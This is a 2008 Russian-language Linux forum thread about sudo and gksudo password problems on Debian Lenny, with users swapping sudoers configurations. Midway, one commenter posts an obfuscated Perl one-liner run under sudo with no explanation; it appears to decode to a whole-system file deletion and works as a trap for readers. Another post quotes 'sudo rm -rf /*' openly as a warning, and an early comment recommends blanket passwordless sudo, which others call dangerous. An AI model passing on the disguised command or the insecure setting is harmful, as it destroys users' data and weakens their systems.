Навигация
Козырьки,Навесы с установкой - сотовый поликарбонат навесы.
Тэги
заказать оригинальные угги интернет магазин
Вход в систему
Поиск
Сейчас на сайте
Сейчас на сайте 0 пользователей и 5 гостей.
Lenny и sudo, gksudo
29.09.2008 в 09:19 — Александр
Срез от 15 сентября 2008 года. То-ли поломали, то- ли руки у меня искривились внезапно, НО: не работает. gksudo просит пароль, я ввожу и тишина.
В консоли sudo просит пароль и в ответ говорит что пароль не верный, хотя пароль тот. Не логиниться же под рутом на самом то деле.
Как побороть?
В консоли sudo просит пароль и в ответ говорит что пароль не верный, хотя пароль тот. Не логиниться же под рутом на самом то деле.
Как побороть?
Комментарии
digger@dignux:~$ sudo cat /etc/sudoers
# /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# See the man page for details on how to write a sudoers file.
#
Defaults env_reset
# Host alias specification
# User alias specification
# Cmnd alias specification
# User privilege specification
root ALL=(ALL) ALL
# Uncomment to allow members of group sudo to not need a password
# (Note that later entries override this, so you might need to move
# it further down)
digger ALL=NOPASSWD: ALL
Добавить в судоерсы как вариант, я о нем думал, но интересно почему так получается в стандартной реализации и где баг. Все-таки забью на проблему и пропишу себя :) Спасиб.
Это не баг. По дефолту дебиан запрещает использование команды sudo тем пользователям которые не прописаны в /etc/sudoers
А если в группу sudo добавить своего пользователя? :)
Такой вопрос: я выключаю комп, вводя sudo halt в консоли, и перегружаю через sudo reboot там же. Надоело уже каждый раз при выключении вводить свой пароль; можно ли как-нибудь сделать так, чтобы при вводе этих двух команд пароль бы не запрашивался?
Это ,кажись, через /etc/sudoers делается. Нужно строчку раскомментировать или добавить. Воспользуйся visudo. В терминале sudo visudo и редактируй файл. И читай , что digger написал.
2Константин digger Поводич: спс огромный за разъяснение. теперь все как надо. :)
2Константин mixer82 Широков: пропиши в судоерсах отмену пароля на эти комманды или вообще отмени запрос пароля при судо.
>digger ALL=NOPASSWD: ALL
вот эта строка ух как опасна
Да это же почти как под рутом сидеть, как я понимаю! Вот лично мне не влом вводить 16-тисимвольный пароль каждый раз, когда нужно, тем более что пароль действует минут пятнадцать... А на ребут можно отдельно поставить nopasswd.
Так, что касается ребута без пароля, то вроде разобрался как это сделать. А есть ли фронтенд к sudo, типа gksu или kdesu, но чтобы не тянул пол-гнома/кедов по зависимостям?
Макс, ага, правильно понимаешь.
Константин, надеюсь, Вы понимаете что есть Фронтенд? Это графика. Так чего вы хотите? Вы используете gksu, у Вас стоит Gnome, так какого банана он с собой еще потащит? GTK есть - все. Так же и с кде.
КДЕ стоит, стоит kdesu. Что за ерунду пишете? Потащит, может быть, пару либ для работы, но это в любом случае.
вот kdesudo, gksudo не ставится по дефолту, а kdesu и gksu тянутся зависимостями
А если не стоит ни гном, ни кде, а стоит какой-нибудь флюксбокс или, как в моём случае, icewm. И принцип анонимуса о том, что десктоп не нужен и все эти его либы тоже.
А хотя ладно, чёрт с ним. Если независимого от десктопов фронтенда нет, то и консольный su-to-root устроит.
>digger ALL=NOPASSWD: ALL
вот эта строка ух как опасна
Извини, но у меня в системе только один юзер - я. ЗАчем мне извращатся чтобы выполнить команду с помощью sudo?
Блин, пофиг сколько юзверей на машине. Фишка не в этом.
Cmnd_Alias SYS = /sbin/halt, /sbin/reboot
digger ALL = NOPASSWD: SYS
Вот этого хватит. Нефиг делать еще что-то беспарольное.
Или ползи под обратно винду и сиди там под админом.
Уважаемый, попрошу повежливее. Я ведь тоже послать могу, и не только в винду
Посылайте. Вот только объясните мне свою точку зрения, почему можно выставлять ALL? В данном случае абсолютно всё равно сколько пользователей в системе, это не для того сделано
sudo perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Воистину... не сочтите за паранойю, но я и на домашней машине убрал 10-минутное окно на sudo. Теперь сначала стоит подумать, стоит ли что-либо делать под судо, перед тем как вводить. Они же сами пишут, что
great knowledge leads to great responsibility.
Кстати, в x таки объяснили, что в дебиане по дефолту для sudo надо вводить пароль юзера а не рута.
Ема народ, так это естесственно!
Это и есть основная идея sudo, что требуется пароль юзера.
Кстати, я так и не понял, таймстампы в судо всетаки опасны, или их не удастся никак использовать сторонней программе? И если они - таки опасны, то как их отключить? Я не нашел в мане.:)
Убрал таки отмену запроса пароля и прописал себя в судоерсы :)
Всем спасиб за ответы.
блиа.... вот с такими вот Никсы будут подвергаться большим атакам/взломам чем сейчас, ибо нубы узнали, что в судоерсах можно отключить пасс... ты же легкая наживка.
попадется скрипток, по дурости запускаешь, а в нутри волшебные самые элементарные строки:
#!/bin/sh
sudo rm -rf /*
а потом будете орать, что никсы дырявые! Сами же себе проблемы делаете.
>Знаешь Миша, а можно еще хер себе дверью специально прищемить
>и потом всем рассказывать про неправильные двери.
(с) LOR ( )
2Артём Thomas Павлович: я наоборот убрал беспарольное судо и прописал юзера чтобы он мог пускать судо (ведь не прописав юзера в sudoers он даже судо пускать не может), НО с обязательным запросом пароля. Ещё раз повторюсь что раньше я жил под SuSe, где по дефолту надо вводить пароль рута, и столкнувшись в дебиане с непоняткой я спросил.
А. Извините, не правильно понял. К стати, цитата с Лора тоже на тему suse :)
Я когда на SuSe жил пару лет, сначала не мог понять почему её все ругают. С выходом 10.3 я начал достигать просветления. Ушел в убунту но тоже что-то не то, ставил слаку, поднимал на моем буке все, т.е. все работало, но не совсем мне подходит её идеология. Вот пришел к логическому завершению скитаний :) А на безопасности я никогда не экономил, т.к. видел что можно сделать с дырявой системой. :)